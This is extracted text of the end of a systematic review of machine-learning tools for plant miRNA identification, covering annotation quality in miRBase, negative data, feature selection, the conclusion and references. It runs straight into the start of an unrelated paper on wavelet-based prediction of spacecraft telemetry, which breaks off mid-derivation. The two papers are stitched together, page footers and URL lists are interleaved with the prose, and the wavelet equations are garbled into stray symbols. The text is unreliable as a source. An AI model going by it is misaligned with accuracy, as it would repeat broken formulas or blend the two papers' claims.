questionable miRNA annotations that are deposited in databases is the unquestionable use of the databases themselves (Taylor et al., 2017). As discussed previously, many of the annotations within databases such as miRBase are questionable at best and at worst incorrect (Taylor et al., 2014; Taylor et al., 2017; Axtell & Meyers, 2018). As such, an additional opportunity for improvement presents itself to both computer scientists and biologists; the selection of high-confidence miRNA’s to be used as benchmarks. Of the papers discussed here all used either miRBase or its precursor the microRNA registry database, of which seven used miRBase version 20 or 21. Of these papers; (Yao et al., 2016; Yousef, Allmer & Khalifa, 2015; Yousef et al., 2016; Vitsios et al., 2017; Douglass et al., 2016; Tseng et al., 2018; Koh & Kim, 2017), only (Douglass et al., 2016) makes reference to the confidence of the sequences used. Whilst they do not explicitly say they used ‘‘high confidence’’ sequences, they specify they required either one or two types of experimental evidence dependant upon species and available evidence (Douglass et al., 2016). The Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 16/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 addition of a ‘‘high confidence’’ tag was made available shortly after the release of miRBase version 20, and it allows users to ‘‘vote’’ if they agree with the ‘‘high confidence’’ tag or not (Kozomara & Griffiths-Jones, 2014). For studies that used miRBase prior to version 20, the use of experimentally-validated miRNAs shows that the miRNA sequences used were of high confidence. However only (Meng et al., 2014; Wu et al., 2011; Douglass et al., 2016) specify the use of experimentally validated sequences. Whilst utilizing only high-confidence miRNAs will increase the manual work required to obtain data from databases and will likely significantly decrease the number of available sequences which may reduce statistic power. However, it may be a necessity to reduce the rate at which false positive miRNAs are being deposited into databases. Whilst it may be outdated due to further miRBase updates, (Taylor et al., 2014) provides a link to a library of valid plant miRNAs in fasta format which can be utilized and/or built upon as a benchmark for future plant miRNAomes. Another important factor in the influx of incorrect annotations is the unquestioning inclusion of all bioinformatically predicted miRNAs (Taylor et al., 2017). It is very likely that computational prediction programs will produce false positives, and the only way to avoid the inclusion of these incorrect annotations is the manual inspection of each positively identified miRNA against the most recent set of guidelines, such as those written by Axtell & Meyers (2018) and Taylor et al. (2017). Whilst this process will massively increase the manual requirements for miRNA identification, it will go some way in preventing the continuous influx of incorrectly annotation sequences into public databases (Taylor et al., 2017). However, the best form of verification of the biological presence of a miRNA is experimental validation. Of the papers discussed in this review, only four (Tseng et al., 2018; Douglass et al., 2016; Sunkar et al., 2008; Breakfield et al., 2012) incorporated some form of experimental validation. Of these, only two studies were based only upon the development of a miRNA prediction model or classifier (Tseng et al., 2018; Douglass et al., 2016). Both of these studies utilized small RNA-Seq data which may still yield false positive miRNA predictions and indeed, this is demonstrated by the experimental validation of predictions that used small RNA-seq data. For example, Tseng et al. (2018) experimentally confirmed the presence of only 18 out of 21 predicted novel miRNAs within two biological replicates and Douglass et al. (2016) was able to validate only two out of 12 high scoring putative miRNAs using their stringent criteria. Whilst it is likely that experimental validation will yield some level of false negative results, it may still be a necessity if progress is to made towards mapping the genuine miRNAome of a given species. Due to the rising concern of poor miRNA annotations in databases, it is likely that many changes will be made by both database curators and researchers. For example, Axtell & Meyers (2018) recommend that all miRNAs identified through a homology-based approach only should be labeled as ‘‘putative’’. In addition, the authors of miRBase (Kozomara & Griffiths-Jones, 2014) are aiming to incorporate a tiered confidence structure for miRNA entries as well as a text-mining based approach to categorize miRNA related articles and extract the biological meanings from the text. These changes may result in the alterations of miRNA annotations and as such, it may benefit biologists to utilize the miRBase change log function available from miRBase 22 or tools such as the miRBase Tracker (Van Peer et al., 2014; Kozomara & Griffiths-Jones, 2014). The use of these tools will aid biologists in Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 17/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 understanding the annotation history of a given miRNA, and perhaps, in the future provide information regarding changes in supporting evidence. Machine learning and feature selection methods related issues also exist in this field. Different groups have used various techniques for selecting negative data without having performed a comprehensive study on the most appropriate technique. But since the quality of the negative data heavily impacts machine learning models, this should directly be addressed. Also, as mentioned before, many authors use features proven to be most effective for animals on models developed for plants without comprehensive evaluation. This likely impacts the performance due to the noticeable differences between plant and animal miRNA sequences (Yao et al., 2016; Douglass et al., 2016). On top of this, some models have not considered feature selection at all (Silla, De O Camargo-Brunetto & Binneck, 2010; Williams, Eyles & Weiller, 2012; Xiao et al., 2011 etc.). As mentioned above, most of the methods haven’t conducted experimental validation of the novel miRNAs predicted by the computational models. In fact, only 4 methods have validated their findings (Breakfield et al., 2012; Douglass et al., 2016; Tseng et al., 2018; Sunkar et al., 2008). Machine learning methods are not perfect; It is important to confirm if the predictions of the model are accurate in order to claim the finding of novel miRNAs. Also, the use of feature selection methods would be beneficial rather than using all available features for the model. But only some of the methods have used feature selection techniques. Considering the differences between plant and animal miRNA sequences, focusing on features specific to plants (instead of using the features that were found to work well for animal miRNAs), and identifying features effective for more complex genomes such as Wheat and Barley would be essential. Use of other sophisticated machine learning algorithms would be beneficial in enhancing the performance of the tools. Apart from the machine learning algorithms mentioned in the primary studies, other opportunities are available with advanced models such as neural networks (Abe, 1997) and deep learning (LeCun, Bengio & Hinton, 2015). However, there needs to be a large dataset in order to use deep learning models and given the sparsity of experimentally validated sequences, this may not be an appropriate route at this time. As such, semi-supervised models that learns from both labeled and unlabeled examples may provide an added advantage. Due to the issues surrounding finding quality negative data, one-class classification or PU learning models (using Positive and Unlabeled samples) (Wu et al., 2017) may also be a fruitful choice. CONCLUSION In this work, we have conducted a systematic review of ab initio plant miRNA identification tools that have been developed over the last decade. To achieve this, five questions were posed which aimed to elucidate the developments and assess the reliability and validity of the various methods used to identify novel plant miRNAs. In total there are 20 studies that addressed plant miRNA identification using machine learning. Although it is a relatively small number of studies, most of the studies report promising results in the range of 90% of accuracy or above obtained through computational validation. Only 55% of the studies focused on only plants and even fewer of them focused Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 18/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 on a specific plant species. This demonstrates a pressing need for plant specific and species specific methods. Compared with the dataset available for animal species, there is a relatively small number of experimentally verified plant miRNAs. This limits the authors and developers of machine learning tools, which require sometimes copious amounts of data for the training of their models. Recognizing the most informative features that are based on unique features of plant datasets will likely increase the accuracy of those methods. Whilst many studies continued using features from previous studies resulting in a large set of features, it’s important to verify that the assumptions that were made when the data was created are still in line with the present understanding of miRNA biology. While it is true that the models are performing well, they are being tested on low quality data. So, we do raise this as a major concern. It is a well-known problem that a considerable number of predicted miRNAs are false predictions (Taylor et al., 2017). So, cleaning up the current knowledge bases should be a top priority. Otherwise, these errors will be propagated as well. An additional challenge is that not all the developed software are accessible by the public. Some of them do not work as advertised due to technical issues and that further decreases the number of available methods with respect to plant miRNA prediction. Given that the intended audience of these tools would be biologists (i.e., non-experts in software development), extreme care must be taken in improving the availability, user friendliness and reliability. For the models involving different parameter options, guidelines must be provided in finding the optimum parameter values for the dataset of interest. ACKNOWLEDGEMENTS The authors would like to gratefully acknowledge the assistance provided for reviewing the manuscript by Dr. Jennifer Lachowiec, Assistant Professor at the Department of Plant Sciences and Plant Pathology, Montana State University. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Buwani Manuweera performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Gillian Reynolds performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Indika Kahanda conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 19/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Data Availability The following information was supplied regarding data availability: The raw data is available in the Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.233#supplemental-information. REFERENCES Abe S. 1997. Overview of neural networks. In: Neural networks and fuzzy systems. Boston: Springer US, 1–5 DOI 10.1007/978-1-4615-6253-5_1. Abu-halaweh NM, Harrison RW. 2010. Identifying essential features for the classifica- tion of real and pseudo microRNAs precursors using fuzzy decision trees. In: 2010 IEEE symposium on computational intelligence in bioinformatics and computational biology, CIBCB 2010. Piscataway: IEEE, 119–125 DOI 10.1109/CIBCB.2010.5510430. Ambros V, Bartel B, Bartel DP, Burge CB, Carrington JC, Chen X, Dreyfuss G, Eddy SR, Griffiths-Jones S, Marshall M, Matzke M, Ruvkun G, Tuschl T. 2003. A uniform system for microRNA annotation. RNA 9(3):277–279 DOI 10.1261/RNA.2183803. An J, Lai J, Sajjanhar A, Lehman ML, Nelson CC. 2014. miRPlant: an integrated tool for identification of plant miRNA from RNA sequencing data. BMC Bioinformatics 15:1–4 DOI 10.1186/1471-2105-15-275. Axtell MJ, Meyers BC. 2018. Revisiting criteria for plant MicroRNA annotation in the era of big data. The Plant Cell 30(2):272–284 DOI 10.1105/tpc.17.00851. Axtell MJ, Westholm JO, Lai EC. 2011. Vive la différence: biogenesis and evolution of microRNAs in plants and animals. Genome Biology 12(4):221 DOI 10.1186/gb-2011-12-4-221. Breakfield NW, Corcoran DL, Petricka JJ, Shen J, Sae-Seaw J, Rubio-Somoza I, Weigel D, Ohler U, Benfey PN. 2012. High-resolution experimental and computational profiling of tissue-specific known and novel miRNAs in Arabidopsis. Genome Research 22(1):163–176 DOI 10.1101/gr.123547.111. Breiman L. 2001. Random forests. Machine Learning 45(1):5–32 DOI 10.1023/A:1010933404324. Challinor AJ, Watson J, Lobell DB, Howden SM, Smith DR, Chhetri N. 2014. A meta- analysis of crop yield under climate change and adaptation. Nature Climate Change 4(4):287–291 DOI 10.1038/nclimate2153. Douglass S, Hsu S-WW, Cokus S, Goldberg RB, Harada JJ, Pellegrini M. 2016. A naïve Bayesian classifier for identifying plant microRNAs. The Plant Journal: for Cell and Molecular Biology 86(6):481–492 DOI 10.1111/tpj.13180. Evers M, Huttner M, Dueck A, Meister G, Engelmann JC. 2015. miRA: adaptable novel miRNA identification in plants using small RNA sequencing data. BMC Bioinformatics 16(16):1–10 DOI 10.1186/s12859-015-0798-3. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 20/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233#supplemental-information http://dx.doi.org/10.7717/peerj-cs.233#supplemental-information http://dx.doi.org/10.7717/peerj-cs.233#supplemental-information http://dx.doi.org/10.1007/978-1-4615-6253-5_1 http://dx.doi.org/10.1109/CIBCB.2010.5510430 http://dx.doi.org/10.1261/RNA.2183803 http://dx.doi.org/10.1186/1471-2105-15-275 http://dx.doi.org/10.1105/tpc.17.00851 http://dx.doi.org/10.1186/gb-2011-12-4-221 http://dx.doi.org/10.1101/gr.123547.111 http://dx.doi.org/10.1023/A:1010933404324 http://dx.doi.org/10.1038/nclimate2153 http://dx.doi.org/10.1111/tpj.13180 http://dx.doi.org/10.1186/s12859-015-0798-3 http://dx.doi.org/10.7717/peerj-cs.233 Fine S, Singer Y, Tishby N. 1998. The hierarchical hidden Markov model: analysis and applications. Machine Learning 32(1):41–62 DOI 10.1023/A:1007469218079. Freund Y, Schapire RE. 1999. A short introduction to boosting. Technical report 5. Gao P, Bai X, Yang L, Lv D, Li Y, Cai H, Ji W, Guo D, Zhu Y. 2010. Over-expression of osa-MIR396c decreases salt and alkali stress tolerance. Planta 231(5):991–1001 DOI 10.1007/s00425-010-1104-2. Guan D-GG, Liao J-YY, Qu Z-HH, Zhang Y, Qu L-HH. 2011. mirExplorer: detecting microRNAs from genome and next generation sequencing data using the AdaBoost method with transition probability matrix and combined features. RNA Biology 8(5):922–934 DOI 10.4161/rna.8.5.16026. Guan Q, Lu X, Zeng H, Zhang Y, Zhu J. 2013. Heat stress induction of miR398 triggers a regulatory loop that is critical for thermotolerance in Arabidopsis. The Plant Journal 74(5):840–851 DOI 10.1111/tpj.12169. Hackenberg M, Rodriguez-Ezpeleta N, Aransay AM. 2011. miRanalyzer: an update on the detection and analysis of microRNAs in high-throughput sequencing experi- ments. Nucleic Acids Research 39(suppl):W132–W138 DOI 10.1093/nar/gkr247. Hoegh Guldberg O, Jacob D, Taylor M, Bindi M, Brown S, Camilloni I, Diedhiou A, Djalante R, Ebi K, Engelbrecht F, Guiot K, Hijioka Y, Mehrotra S, Payne A, Seneviratne S, Thomas A, Warren R, Zhou G, Halim S, Achlatis M, Alexander L, Allen M, Berry P, Boyer C, Brilli L, Buckeridge M, Cheung W, Craig M, Ellis N, Evans J, Fisher H, Fraedrich K, Fuss S, Ganase A, Gattuso J, Greve P, Guillen T, Hanasaki N, Hasegawa T, Hayes K, Hirsch A, Jones C, Jung T, Kanninen M, Krinner G, Lawrence D, Lenton T, Ley D, Liveman D, Mahowald N, McInnes K, Meissner K, Millar R, Mintenbeck K, Mitchell D, Mix A, Notz D, Nurse L, Okem A, Olsson L, Oppenheimer M, Paz S, Peterson J, Petzold J, Preuschmann S, Rahman M, Rogelj J, Scheuffele H, Schleussner C-F, Scott D, Seferian R, Sillmann J, Singh C, Slade R, Stephenson K, Stephenson T, Sylla M, Tebboth M, Tschakert P, Vautard R, Wartenburger R, Wehner M, Weyer N, Whyte F, Yohe G, Zhang X, Zougmore R. 2018. Chapter 3: impacts of 1.5 ◦C global warming on natural and human systems. Global Warming of 1.5 ◦C. An IPCC special report on the impacts of global warming of 1.5 ◦C above pre-industrial levels and related global greenhouse gas emission pathways, in the context of strengthening the global response to the threat of climate change. Intergovernmental Panel on Climate Change. Available at http://pure.iiasa.ac.at/id/eprint/15518/ . Hu Y, Lan W, Miller D. 2017. Next-generation sequencing for microRNA expression profile. New York: Humana Press, 169–177 DOI 10.1007/978-1-4939-7046-9_12. Kadri S, Hinman V, Benos PV. 2009. HHMMiR: efficient de novo prediction of mi- croRNAs using hierarchical hidden Markov models. BMC Bioinformatics 10(SUPPL. 1):1–12 DOI 10.1186/1471-2105-10-S1-S35. Kecman V. 2005. Support vector machines—an introduction. Springer, Berlin, Heidelberg, 1–47 DOI 10.1007/10984697_1. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 21/25 https://peerj.com http://dx.doi.org/10.1023/A:1007469218079 http://dx.doi.org/10.1007/s00425-010-1104-2 http://dx.doi.org/10.4161/rna.8.5.16026 http://dx.doi.org/10.1111/tpj.12169 http://dx.doi.org/10.1093/nar/gkr247 http://pure.iiasa.ac.at/id/eprint/15518/ http://dx.doi.org/10.1007/978-1-4939-7046-9_12 http://dx.doi.org/10.1186/1471-2105-10-S1-S35 http://dx.doi.org/10.1007/10984697_1 http://dx.doi.org/10.7717/peerj-cs.233 Koh I, Kim K-B. 2017. miRHunter: a tool for predicting microRNA precursors based on combined computational method. BioChip Journal 11(12):164–171 DOI 10.1007/s13206-017-1210-3. Kozomara A, Birgaoanu M, Griffiths-Jones S. 2019. miRBase: from microRNA se- quences to function. Nucleic Acids Research 47(D1):D155–D162 DOI 10.1093/nar/gky1141. Kozomara A, Griffiths-Jones S. 2014. miRBase: annotating high confidence microRNAs using deep sequencing data. Nucleic Acids Research 42(Database issue):68–73 DOI 10.1093/nar/gkt1181. LeCun Y, Bengio Y, Hinton G. 2015. Deep learning. Nature 521(7553):436–444 DOI 10.1038/nature14539. Li W-X, Oono Y, Zhu J, He X-J, Wu J-M, Iida K, Lu X-Y, Cui X, Zhu J-K. 2008. The Arabidopsis NFYA5 transcription factor is regulated transcriptionally and posttran- scriptionally to promote drought resistance. Source: The Plant Cell 20(8):2238–2251 DOI 10.1105/tpc.108.059444. Liberati A, Altman DG, Tetzlaff J, Mulrow C, Gøtzsche PC, Ioannidis JPA, Clarke M, Devereaux PJ, Kleijnen J, Moher D. 2009. The PRISMA statement for re- porting systematic reviews and meta-analyses of studies that evaluate health care interventions: explanation and elaboration. PLOS Medicine 6(7):e1000100 DOI 10.1371/journal.pmed.1000100. Liu B, Asseng S, Müller C, Ewert F, Elliott J, Lobell D, Martre P, Ruane A, Wallach D, Jones J, Rosenzweig C, Aggarwal P, Alderman P, Anothai J, Basso B, Biernath C, Cammarano D, Challinor A, Deryng D, Sanctis G, Doltra J, Fereres E, Folberth C, Garcia-Vila M, Gayler S, Hoogenboom G, Hunt L, Izaurralde R, Jabloun M, Jones C, Kersebaum K, Kimball B, Koehler A-K, Kumar S, Nendel C, OLeary G, Olesen J, Ottman M, Palosuo T, Prasad P, Priesack E, Pugh T, Reynolds M, Rezaei E, Rötter R, Schmid E, Semenov M, Shcherbak I, Stehfest E, Stöckle C, Stratonovitch P, Streck T, Supit I, Tao F, Thorburn P, Waha K, Wall G, Wang E, White J, Wolf J, Zhao Z, Zhu Y. 2016. Similar estimates of temperature impacts on global wheat yield by three independent methods. Nature Climate Change 6(12):1130–1136 DOI 10.1038/nclimate3115. Liu L, Li Y, Li S, Hu N, He Y, Pong R, Lin D, Lu L, Law M. 2012. Comparison of next- generation sequencing systems. Journal of Biomedicine and Biotechnology 2012:1–11 DOI 10.1155/2012/251364. Mall R, Gupta A, Sonkar G. 2017. Effect of climate change on agricultural crops. Current Developments in Biotechnology and Bioengineering Epub ahead of print Sep 23 2016 DOI 10.1016/B978-0-444-63661-4.00002-5. Meng J, Liu D, Sun C, Luan Y. 2014. Prediction of plant pre-microRNAs and their mi- croRNAs in genome-scale sequences using structure-sequence features and support vector machine. BMC Bioinformatics 15(1):423 DOI 10.1186/s12859-014-0423-x. Meyers BC, Axtell MJ, Bartel B, Bartel DP, Baulcombe D, Bowman JL, Cao X, Carring- ton JC, Chen X, Green PJ, Griffiths-Jones S, Jacobsen SE, Mallory AC, Martienssen RA, Poethig RS, Qi Y, Vaucheret H, Voinnet O, Watanabe Y, Weigel D, Zhu J-K. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 22/25 https://peerj.com http://dx.doi.org/10.1007/s13206-017-1210-3 http://dx.doi.org/10.1093/nar/gky1141 http://dx.doi.org/10.1093/nar/gkt1181 http://dx.doi.org/10.1038/nature14539 http://dx.doi.org/10.1105/tpc.108.059444 http://dx.doi.org/10.1371/journal.pmed.1000100 http://dx.doi.org/10.1038/nclimate3115 http://dx.doi.org/10.1155/2012/251364 http://dx.doi.org/10.1016/B978-0-444-63661-4.00002-5 http://dx.doi.org/10.1186/s12859-014-0423-x http://dx.doi.org/10.7717/peerj-cs.233 2008. Criteria for annotation of plant MicroRNAs. Plant Cell 20(12):3186–3190 DOI 10.1105/tpc.108.064311. Moran Y, Agron M, Praher D, Technau U. 2017. The evolutionary origin of plant and animal microRNAs. Nature Ecology & Evolution 1(3):0027 DOI 10.1038/s41559-016-0027. Ray DK, Mueller ND, West PC, Foley JA. 2013. Yield trends are insufficient to double global crop production by 2050. PLOS ONE 8(6):e66428 DOI 10.1371/journal.pone.0066428. Rogers K, Chen X. 2013. Biogenesis, turnover, and mode of action of plant MicroRNAs. The Plant Cell 25(7):2383–2399 DOI 10.1105/tpc.113.113159. Runkler TA. 2012. Classification. In: Data analytics. Wiesbaden: Vieweg+Teubner Verlag, 85–101 DOI 10.1007/978-3-8348-2589-6_8. Silla PR, De O Camargo-Brunetto MA, Binneck E. 2010. Using a support vector machine to identify pre-miRNAs in soybean (Glycine max) introns. In: 2010 10th international conference on intelligent systems design and applications. Piscataway: IEEE, 1235–1241. Available at http://ieeexplore.ieee.org/document/5687077/ DOI 10.1109/ISDA.2010.5687077. Sunkar R, Li Y-F, Jagadeeswaran G. 2012. Functions of microRNAs in plant stress re- sponses. Trends in Plant Science 17(4):196–203 DOI 10.1016/J.TPLANTS.2012.01.010. Sunkar R, Zhou X, Zheng Y, Zhang W, Zhu J-KK. 2008. Identification of novel and candidate miRNAs in rice by high throughput sequencing. BMC Plant Biology 8(1):1–17 DOI 10.1186/1471-2229-8-25. Swain PH, Hauska H. 1977. The decision tree classifier: design and potential. IEEE Transactions on Geoscience Electronics 15(3):142–147 DOI 10.1109/TGE.1977.6498972. Taylor RS, Tarver JE, Foroozani A, Donoghue PCJ. 2017. MicroRNA annota- tion of plant genomes—do it right or not at all. BioEssays 39(2):1600113 DOI 10.1002/bies.201600113. Taylor RS, Tarver JE, Hiscock SJ, Donoghue PCJ. 2014. Evolutionary history of plant microRNAs. Trends in Plant Science 19:175–182 DOI 10.1016/j.tplants.2013.11.008. Trindade I, Capitão C, Dalmay T, Fevereiro MP, Santos DMD. 2010. miR398 and miR408 are up-regulated in response to water deficit in Medicago truncatula. Planta 231(3):705–716 DOI 10.1007/s00425-009-1078-0. Tseng K-C, Chiang-Hsieh Y-F, Pai H, Chow C-N, Lee S-C, Zheng H-Q, Kuo P-L, Li G-Z, Hung Y-C, Lin N-S, Chang W-C. 2018. microRPM: a microRNA prediction model based only on plant small RNA sequencing data. Bioinformatics 34(7):1108–1115 DOI 10.1093/bioinformatics/btx725. Unamba CIN, Nag A, Sharma RK. 2015. Next generation sequencing technologies: the doorway to the unexplored genomics of non-model plants. Frontiers in Plant Science 6:1074 DOI 10.3389/fpls.2015.01074. Van Peer G, Lefever S, Anckaert J, Beckers A, Rihani A, Van Goethem A, Vold- ers P-J, Zeka F, Ongenaert M, Mestdagh P, Vandesompele J. 2014. miRBase Tracker: keeping track of microRNA annotation changes. Database 2014: bau080 DOI 10.1093/database/bau080. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 23/25 https://peerj.com http://dx.doi.org/10.1105/tpc.108.064311 http://dx.doi.org/10.1038/s41559-016-0027 http://dx.doi.org/10.1371/journal.pone.0066428 http://dx.doi.org/10.1105/tpc.113.113159 http://dx.doi.org/10.1007/978-3-8348-2589-6_8 http://ieeexplore.ieee.org/document/5687077/ http://dx.doi.org/10.1109/ISDA.2010.5687077 http://dx.doi.org/10.1016/J.TPLANTS.2012.01.010 http://dx.doi.org/10.1186/1471-2229-8-25 http://dx.doi.org/10.1109/TGE.1977.6498972 http://dx.doi.org/10.1002/bies.201600113 http://dx.doi.org/10.1016/j.tplants.2013.11.008 http://dx.doi.org/10.1007/s00425-009-1078-0 http://dx.doi.org/10.1093/bioinformatics/btx725 http://dx.doi.org/10.3389/fpls.2015.01074 http://dx.doi.org/10.1093/database/bau080 http://dx.doi.org/10.7717/peerj-cs.233 Vitsios DM, Kentepozidou E, Quintais L, Benito-Gutiérrez E, Van Dongen S, Davis MP, Enright AJ. 2017. Mirnovo: genome-free prediction of microRNAs from small RNA sequencing data and single-cells using decision forests. Nucleic Acids Research 45(21):e177 DOI 10.1093/nar/gkx836. Voinnet O. 2009. Origin, biogenesis, and activity of plant MicroRNAs. Cell 136(4):669–687 DOI 10.1016/J.CELL.2009.01.046. Williams PH, Eyles R, Weiller G. 2012. Plant MicroRNA prediction by supervised machine learning using C5.0 decision trees. Journal of Nucleic Acids 2012:1–10 DOI 10.1155/2012/652979. Wu J, Pan S, Zhu X, Zhang C, Wu X. 2017. Positive and Unlabeled multi-graph learning. IEEE Transactions on Cybernetics 47(4):818–829 DOI 10.1109/TCYB.2016.2527239. Wu Y, Wei B, Liu H, Li T, Rayner S. 2011. MiRPara: a SVM-based software tool for prediction of most probable microRNA coding regions in genome scale sequences. BMC Bioinformatics 12(107) DOI 10.1186/1471-2105-12-107. Xiao J, Tang X, Li Y, Fang Z, Ma D, He Y, Li M. 2011. Identification of microRNA precursors based on random forest with network-level representation method of stem-loop structure. BMC Bioinformatics 12(1):165 DOI 10.1186/1471-2105-12-165. Xuan P, Guo M, Liu X, Huang Y, Li W, Huang Y. 2011. PlantMiRNAPred: efficient clas- sification of real and pseudo plant pre-miRNAs. Bioinformatics 27(10):1368–1376 DOI 10.1093/bioinformatics/btr153. Xue C, Li F, He T, Liu G-P, Li Y, Zhang X. 2005. Classification of real and pseudo microRNA precursors using local structure-sequence features and support vector machine. BMC Bioinformatics 6(1):310 DOI 10.1186/1471-2105-6-310. Yao Y, Ma C, Deng H, Liu Q, Zhang J, Yi M. 2016. plantMirP: an efficient com- putational program for the prediction of plant pre-miRNA by incorporating knowledge-based energy features. Molecular BioSystems 12(10):3124–3131 DOI 10.1039/C6MB00295A. Yousef M, Allmer J, Khalifa W. 2015. Sequence motif-based one-class classifiers can achieve comparable accuracy to two-class learners for plant microRNA detection. Journal of Biomedical Science and Engineering 08(10):684–694 DOI 10.4236/jbise.2015.810065. Yousef M, Allmer J, Khalifa W, Yousef M. 2016. Accurate plant MicroRNA prediction can be achieved using sequence motif features. Journal of Intelligent Learning Systems and Applications 8(8):9–22 DOI 10.4236/jilsa.2016.81002. Zhang X, Zou Z, Gong P, Zhang J, Ziaf K, Li H, Xiao F, Ye Z. 2011. Over-expression of microRNA169 confers enhanced drought tolerance to tomato. Biotechnology Letters 33(2):403–409 DOI 10.1007/s10529-010-0436-0. Zhang Y, Yun Z, Gong L, Qu H, Duan X, Jiang Y, Zhu H. 2018. Comparison of miRNA evolution and function in plants and animals. MicroRNA 7(1):4–10 DOI 10.2174/2211536607666180126163031. Zhao B, Liang R, Ge L, Li W, Xiao H, Lin H, Ruan K, Jin Y. 2007. Identification of drought-induced microRNAs in rice. Biochemical and Biophysical Research Commu- nications 354(2):585–590 DOI 10.1016/J.BBRC.2007.01.022. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 24/25 https://peerj.com http://dx.doi.org/10.1093/nar/gkx836 http://dx.doi.org/10.1016/J.CELL.2009.01.046 http://dx.doi.org/10.1155/2012/652979 http://dx.doi.org/10.1109/TCYB.2016.2527239 http://dx.doi.org/10.1186/1471-2105-12-107 http://dx.doi.org/10.1186/1471-2105-12-165 http://dx.doi.org/10.1093/bioinformatics/btr153 http://dx.doi.org/10.1186/1471-2105-6-310 http://dx.doi.org/10.1039/C6MB00295A http://dx.doi.org/10.4236/jbise.2015.810065 http://dx.doi.org/10.4236/jilsa.2016.81002 http://dx.doi.org/10.1007/s10529-010-0436-0 http://dx.doi.org/10.2174/2211536607666180126163031 http://dx.doi.org/10.1016/J.BBRC.2007.01.022 http://dx.doi.org/10.7717/peerj-cs.233 Zhong Y, Xuan P, Han K, Zhang W, Li J. 2015. Improved Pre-miRNA classification by reducing the effect of class imbalance. BioMed Research International 2015:1–12 DOI 10.1155/2015/960108. Zhou L, Liu Y, Liu Z, Kong D, Duan M, Luo L. 2010. Genome-wide identification and analysis of drought-responsive microRNAs in Oryza sativa. Source: Journal of Experimental Botany 61(15):4157–4168 DOI 10.1093/jxb/erq237. Zhu R, Zhang Z, Li Y, Hu Z, Xin D, Qi Z, Chen Q. 2016. Discovering numerical differences between animal and plant microRNAs. PLOS ONE 11(10):e0165152 DOI 10.1371/journal.pone.0165152. Zou Q, Mao Y, Hu L, Wu Y, Ji Z. 2014. miRClassify: an advanced web server for miRNA family classification and annotation. Computers in Biology and Medicine 45(1):157–160 DOI 10.1016/j.compbiomed.2013.12.007. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 25/25 https://peerj.com http://dx.doi.org/10.1155/2015/960108 http://dx.doi.org/10.1093/jxb/erq237 http://dx.doi.org/10.1371/journal.pone.0165152 http://dx.doi.org/10.1016/j.compbiomed.2013.12.007 http://dx.doi.org/10.7717/peerj-cs.233 work_jttjd62ksvbjzkuni7ex4hohnm ---- Application of wavelet analysis in the prediction of telemetry data International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 28 Application of Wavelet Analysis in The Prediction of Telemetry Data Xu Jiangtao School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: 1400693814@qq.com Liu Pingping School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: 134369601@qq.com Abstract—With the rapid development of space technology, the increasing number of spacecraft, in-orbit risk also increases, how to ensure that the spacecraft safety and reliability is particularly important. Prediction technology can predict the failure of the spacecraft in advance, and it has won valuable time for the fault of the spacecraft troubleshooting, thereby increasing the safety and reliability of spacecraft operation. In this paper, based on the non-stationary and periodicity of telemetry data. Based on the wavelet analysis, the prediction of the data is introduced, the establishment of a short-term forecasting model based on Mallat algorithm. The experimental results show that the prediction curve is basically consistent with the actual curve. Keywords-Wavelet Analysis; Fourier Transform; Periodic Autoregression; Models; Mallat. I. INTRODUCTION The prediction technology of spacecraft fault has been a hot research field. After 20 years development of prediction theory, until the discrete parameters of the linear model of a finite parameter linear model is proposed, and it is possible to combine the prediction theory with the computer. According to the different properties of the forecast, the forecasting methods are generally divided into two categories: time series forecasting and causal prediction. Time series prediction is made by the past predict the future value of the prediction, and causal forecasting is through the known variables to predict the values of other variables. In this paper, the time series forecasting method is used to forecast the future development trend of the telemetry data. II. WAVELET ANALYSIS THEORY A. Wavelet analysiss The wavelet analysis method has the characteristics of low frequency and high frequency of the non-stationary signal that change with the low-frequency information signals using a wide time window, high frequency information using a narrow time window. Wavelet is a small area of the wave, waveform with special length, average of 0.Wavelet are defined as follows [1] . Set ( )t to one square integrable function, namely 2 ( ) ( )t L R  , if the Fourier transform to meet the conditions: 2 ˆ ( ) R C d         (1) (1)formula called ( )t is a basic wavelet or wavelet generating function. When the generating function ( )t is expanding and translating, it can get function , ( )a t : DOI: 10.21307/ijanmc-2019-044 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 29 , 1 ( ) ( ) a t t aa       , among them , ; 0a R a   (2) In (2) formula, a is the scaling factor, t is the translation factor, Because the value of scale factor and translation factor is continuously changing, and depends on the parameters, it is a set of sequence of functions which are obtained by the expansion and translation of the generating function, also called sub-wavelet. B. Mallat algorithm The basic idea of the Mallat algorithm is as follows: Let jH f as the approximation of the energy limited signal 2 ( )f L R in the resolution 2 j ,Then the jH f is further decomposed into the approximation of 1jH f under the f resolution 12 j , and the details of 1j D f  between 12 j and 2 j . 1) Mallat algorithm based on wavelet decomposition From Multi-resolution analysis: 2 ( ) j Z j L R W    , To arbitrary function 2 ( 